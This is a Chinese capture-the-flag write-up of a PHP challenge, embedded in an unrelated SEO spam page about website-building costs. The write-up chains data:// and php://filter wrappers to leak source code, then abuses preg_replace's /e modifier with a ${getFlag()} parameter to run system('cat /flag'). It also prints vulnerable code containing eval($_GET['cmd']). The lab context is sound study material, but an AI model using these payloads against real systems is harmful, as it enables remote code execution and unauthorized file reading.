当前位置: 首页 > news >正文

自己做的电商网站要多少钱在线阅读小说网站怎么建设

自己做的电商网站要多少钱,在线阅读小说网站怎么建设,深圳app软件开发公司,工程合同承包协议书完整版1、点开连接,页面出现了提示 传入一个参数text,里面的内容要包括I have a dream。 构造:?/textI have a dream。发现页面没有显示。这里推测可能得使用伪协议 在文件包含那一行,我们看到了next.php的提示,我们尝试读取…

1、点开连接,页面出现了提示

传入一个参数text,里面的内容要包括I have a dream。

构造:?/text=I have a dream。发现页面没有显示。这里推测可能得使用伪协议

在文件包含那一行,我们看到了next.php的提示,我们尝试读取文件

根据代码:我们构造payload

/?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

2、页面出现base64编码

 

3、解码之后得到一串代码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;function complex($re, $str) {return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}foreach($_GET as $re => $str) {echo complex($re, $str). "\n";
}function getFlag(){@eval($_GET['cmd']);
}

4、分析代码:

 定义了一个名为 complex 的函数,用于对字符串进行正则替换操作。具体来说,它会将匹配到的字符串转换为小写。

/ei:当作php代码来执行,忽略大小写

定义了一个getFlag函数,将参数cmd中的参数输出

5、由此我们可以构造新payload

/?text=data://text/pain,I have a dream&file=next.php&\S*=${getFlag()}&cmd=system('cat /flag');

使用正则表达式匹配一个或多个非空白字符(\S*),然后将其赋值给一个变量。

http://www.laogonggong.com/news/64665.html

相关文章:

  • 网站建设一秒互联wordpress幻灯片非插件
  • 阿里云做的网站空间临高网站建设
  • 网站的建设方法免费企业名录软件
  • 做网站售后几年wordpress 注册用户列表
  • 网站开发 技术路线网店推广总结
  • 网站流量分布免费空间100m
  • 官方网站页面尺寸左侧菜单设置设置 wordpress
  • 响应式手机网站怎么做phpcms手机网站
  • 张家港做网站费用高端品牌网站建设内容
  • 做豆腐交流经验的网站提供o2o网站建设
  • html企业网站源码下载全面的客户管理系统
  • 电商网站价格监控东莞网站开发技术公司
  • 网站开发策略谁会在西安做网站的吗
  • 常见网站页面布局类型少女のトゲ在线观看
  • dw软件怎么做网页长沙网站关键词seo
  • 潍坊建站模板搭建十九冶成都建设有限公司网站
  • 网站管理员在哪里互联网广告营销方案
  • wordpress学校网站网站平台做推广方案设计
  • 做网站要的带宽是什么网站阴影
  • 网站群管理平台建设浙江省建设协会网站首页
  • 网站如何做视频的软件模板网站修改
  • 二级网站怎样做排名网推网站
  • 做网站流量小说搜索风云榜排名
  • 找个网页公司做网站wordpress签到领积分
  • 苏州网站建设开发公司凡科建站网址
  • 企业网站服务类型小程序制作后维护成本
  • 普通网站制作网站菜单模板
  • 建立自己的网站seo厂商
  • 东莞网站优化快速排名2017网站开发主流工具
  • 家装网站自己做的可以免费注册的网站